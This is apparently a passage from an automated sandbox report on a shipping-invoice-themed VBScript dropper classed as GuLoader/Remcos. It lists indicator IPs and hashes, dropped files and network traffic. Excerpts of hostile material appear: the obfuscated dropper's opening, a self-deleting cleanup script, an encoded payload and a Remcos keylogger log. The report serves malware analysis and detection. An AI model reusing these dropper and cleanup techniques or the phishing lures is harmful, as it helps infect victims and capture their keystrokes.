                                        M247GBTOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        invoice-72717953897646054572255005658360083176291774189023-quiltercheviot.pdfGet hashmaliciousHTMLPhisherBrowse
                                        • 38.132.122.254
                                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        BviOG97ArX.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 173.211.86.129
                                        DCwYFBy6z7.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 38.204.196.215
                                        DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        Deutschepost Invoice & Awb0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                        • 38.207.19.49
                                        https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA0MzgwJnMyPTY0MzU5MTI4JnMzPUdMQg==Get hashmaliciousPhisherBrowse
                                        • 195.133.83.209
                                        https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA4OTYzJnMyPTY0MzU5MTI4JnMzPUdMQg==Get hashmaliciousPhisherBrowse
                                        • 195.133.83.209

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eF46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.112.252
                                        8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.112.252
                                        gB49zgUhr8.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.112.252
                                        AdhP1WMUi5.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.112.252
                                        http://trk-synovetra.comGet hashmaliciousUnknownBrowse
                                        • 192.185.112.252
                                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 192.185.112.252
                                        Ph58Rkdxor.exeGet hashmaliciousXWormBrowse
                                        • 192.185.112.252
                                        4kvADqDmZ4.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                        • 192.185.112.252
                                        doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.112.252
                                        Drawing specification and June PO #07329.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        • 192.185.112.252
                                        37f463bf4616ecd445d4a1937da06e19capisp.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                        • 192.185.112.252
                                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 192.185.112.252
                                        doc20240625-00073.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 192.185.112.252
                                        SeAH RFP_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                        • 192.185.112.252
                                        20240506_120821.xlsGet hashmaliciousUnknownBrowse
                                        • 192.185.112.252
                                        New Order CHAL-0435.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 192.185.112.252
                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 192.185.112.252
                                        zyJWi2vy29.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                                        • 192.185.112.252
                                        56bDgH9sMQ.exeGet hashmaliciousVidarBrowse
                                        • 192.185.112.252
                                        vjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                        • 192.185.112.252

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json

                                        Download File
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):962
                                        Entropy (8bit):5.013811273052389
                                        Encrypted:false
                                        SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                        MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                        SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                        SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                        SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                        Malicious:false
                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):11608
                                        Entropy (8bit):4.8908305915084105
                                        Encrypted:false
                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                        Malicious:false
                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllulbnolz:NllUc
                                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                        Malicious:false
                                        Preview:@...e................................................@..........

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oogrjtkq.5mz.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdzewvb3.idp.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xk34jjgh.il5.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\bhvB999.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x93162959, page size 32768, DirtyShutdown, Windows version 10.0
                                        Category:dropped
                                        Size (bytes):16252928
                                        Entropy (8bit):0.9745410493381076
                                        Encrypted:false
                                        SSDEEP:6144:ooTzWYo1CKGP5q/XiE9ENP//Xsx0BnNP//Xsx0Bn695nk8eX8e58ekpj98ev8ef5:Vh+DFrVe90FZEhVKsKaNR9
                                        MD5:75E89EFC73D96AADD28DE34D3835EBE8
                                        SHA1:3795F9B5071AF7C56911E3C123B5F97215A6F363
                                        SHA-256:F507DA6A39332803AF242E5CF3455B3A22A516C430D0FF1906F19128EFAEE3F0
                                        SHA-512:CF7575A508871C6E9F35845A525D6B651087D78A559708CAE62389C6CAF75BA42690C04EDF9F27E0F6311CDA1459AAC3D879DA45E6495C2C066B49B754257B72
                                        Malicious:false
                                        Preview:..)Y... .......4........X.2';...{k.......................k..........{.......|..h.m............................';...{-.............................................................................................S...........eJ......n........................................................................................................... ............{E..................................................................................................................................................................................................{E....................................Z6....|....................`.....|...........................#......h.m.....................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs

                                        Download File
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):346
                                        Entropy (8bit):3.452804879023423
                                        Encrypted:false
                                        SSDEEP:6:xPW+YR4lA2QOm3OOZgypjRQIQMlziKJRBgUubdlrYSWn+SkgI9lAn9YKJRB4y0a8:xQ4lA2++ugypjBQMB3DubdpYS5s4lG9W
                                        MD5:66442CCD48F759B031F9B823384E55BC
                                        SHA1:B23D081BDC9686E199BCD24AECCD77CCF4550DC6
                                        SHA-256:8705236D12F3890C431EEF683356787B711351E8B302A2CC1FD333ECD8198355
                                        SHA-512:5FDB17E0E5F520BCAAAB6A160655D608F8E5CEFE49C6AA221B808D256294AE565E05F3F097C875ED716E8424C4C180418D7216014846D54A44948961169DF245
                                        Malicious:true
                                        Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.w.i.n.d.o.w.s. .m.a.i.l.\.w.a.b...e.x.e."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                        C:\Users\user\AppData\Local\Temp\ycflhgp

                                        Download File
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:Qn:Qn
                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                        Malicious:false
                                        Preview:..

                                        C:\Users\user\AppData\Roaming\Proskriberes.Bet

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):478448
                                        Entropy (8bit):5.980068053888083
                                        Encrypted:false
                                        SSDEEP:6144:BvBeICCYQwzXKYWutZNqumC3gou/xKJP7aDC0qTDwfhbdUhTi8CRsYKNIJBw:9MPCrGXjWmL/3Hu47au1TGqi9RvJBw
                                        MD5:710644F1295D73AF29B91F191549635E
                                        SHA1:DA74950F94B693C273E3E3F95ED6366AA68A93F0
                                        SHA-256:5595275FB9355E5017A7033452DB54826C0EF829573B16EAF4E30E32473B903B
                                        SHA-512:63ECD9F46403895429E53F32BF9EAA00A48ABFABF215614E38754287040079688287CDF7F6ECCA8236EE5F7B97D22173F27ABFDA0FF01E4A785B1452ADDABEC2
                                        Malicious:false
                                        Preview:2fsPaODrQi5ivStlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZemnAAAAD+nF3svrVaeXYw8nJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJycnJyc6Yw/Y6WYP2P3rQApO1j7X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19eQZg/h/Os9RxSeHZ+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn+mkAAAAD9X62eXrP1To8HqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampaMZg/6xdnz61QMm7kFaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWkPb8eH9utKwZORRGpqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqampqamoPrvDYxOtSoqDZBD8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/Pz8/P7vP0RQAZg9q1t7562CLsPUKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqK

                                        C:\Users\user\AppData\Roaming\kpburtts.dat

                                        Download File
                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):336
                                        Entropy (8bit):3.357735783530425
                                        Encrypted:false
                                        SSDEEP:6:6lVdNyU5YcIeeDAlMlVdNyIbWAAe5UlVdN7/wR1SlVdNelnAbWAv:6lVyUecmlVyIbWFe5UlV/lVelAbW+
                                        MD5:C2861AF443539E4BF998B7514A4634DD
                                        SHA1:C4B19C57E22BBF9E583DCA263B31E4B6FDF31899
                                        SHA-256:05883416D8B9B7FBAFB4950ABA92DDED042188A77BF4510B56BEA9C62B5E06F8
                                        SHA-512:5B90B5ECEC94CE79A60E568584A301BDC8EB708B37732684D1E0BBAB6F087A2D0A570347FFBB006BA82D9C94EC86994F6130C2B57827219DEB40CD2203D91AB2
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\kpburtts.dat, Author: Joe Security
                                        Preview:....[.2.0.2.4./.0.7./.0.1. .1.0.:.1.9.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.7./.0.1. .1.0.:.1.9.:.5.4. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.7./.0.1. .1.0.:.1.9.:.5.9. .R.u.n.].........[.2.0.2.4./.0.7./.0.1. .1.0.:.2.0.:.0.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                        Static File Info

                                        General

                                        File type:ASCII text, with very long lines (2227), with CRLF line terminators
                                        Entropy (8bit):5.336273532370536
                                        TrID:
                                        • Visual Basic Script (13500/0) 100.00%
                                        File name:DHL Shipping Document Awb & BL.vbs
                                        File size:22'730 bytes
                                        MD5:af8e905368962cfb4873c41a77b4515c
                                        SHA1:577337de5d106e6b11225be7c362f33a8d5c0831
                                        SHA256:bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
                                        SHA512:8fca68d732a9db1a4a6d9b955a361a5bd37bdd7c994e9094b31799cc7c4c6448fc620d2bf8928532a261680c78e8e138f0b960d9fa630dfc0b4e51c7e756a9c2
                                        SSDEEP:384:KlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwfEa+MCq22HX:6zSR022X/523S0e8xPPmra+Mq01N
                                        TLSH:09A21AF0CE4B3119CB5B3ED69C6948815AF59046823128B5E6ED0BED6383C5CD3FAD98
                                        File Content Preview:Function Fusionsdatoernes....Call Elevarbejder.ShellExecute("P" & Anyone, Ergometercykelen, "", "", Aalegaard)....End Function ....Spetrevlemundstetiser = String(236,"M") ....Rvertogterne = 61512..Supranaturalistic = &H617B..decreers = -54055..dermophobe

                                        File Icon

                                        Icon Hash:68d69b8f86ab9a86

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 1, 2024 16:19:06.169537067 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.169596910 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.169867992 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.190541029 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.190574884 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.702172041 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.702255964 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.705897093 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.705909967 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.706182957 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.712649107 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.760499954 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.840528011 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.840554953 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.840619087 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.840645075 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.860399008 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.860464096 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.860474110 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.903445959 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.929949999 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.929972887 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.930135012 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.931009054 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.931016922 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.931083918 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.949573994 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.949584961 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.949628115 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.949635983 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.949681044 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.949700117 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:06.949731112 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:06.949752092 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.019558907 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.019639015 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.019774914 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.019836903 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.020814896 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.020879030 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.021172047 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.021235943 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.021771908 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.021838903 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.022970915 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.023039103 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.038703918 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.038788080 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.038861990 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.038924932 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.108328104 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.108417988 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.108715057 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.108787060 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.109067917 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.109143972 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.109709978 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.109781027 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.110066891 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.110326052 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.110968113 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.111027002 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.127542019 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.127618074 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.127990961 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.128060102 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.128703117 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.128767967 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.128813982 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.128865004 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.197971106 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.198059082 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.198112011 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.198168039 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.198369026 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.198446989 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.198997021 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199042082 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199074030 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199084997 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199099064 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199124098 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199439049 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199496031 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199508905 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199513912 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.199536085 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.199563026 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.200208902 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.200289965 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.200457096 CEST44349707192.185.112.252192.168.2.9
                                        Jul 1, 2024 16:19:07.200516939 CEST49707443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:19:07.201040983 CEST44349707192.185.112.252192.168.2.9
